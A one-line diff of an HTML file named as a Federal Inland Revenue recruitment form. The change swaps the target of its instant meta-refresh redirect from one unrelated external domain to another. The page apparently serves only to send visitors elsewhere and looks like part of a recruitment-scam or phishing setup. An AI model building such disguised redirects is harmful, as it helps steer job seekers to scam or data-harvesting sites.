--- a/Federal-Inland-Revenue-Recruitment-Form.html
+++ b/Federal-Inland-Revenue-Recruitment-Form.html
@@ -1,1 +1,1 @@
- <meta http-equiv="refresh" content="0; url=https://mpetition.org/Federal-Inland-Reve-Recruitment-Form.html#1729577635972">
+ <meta http-equiv="refresh" content="0; url=https://dataplugz.org/Federal-Inland-Revenue-Recruitment-Form.html#1729598325973">
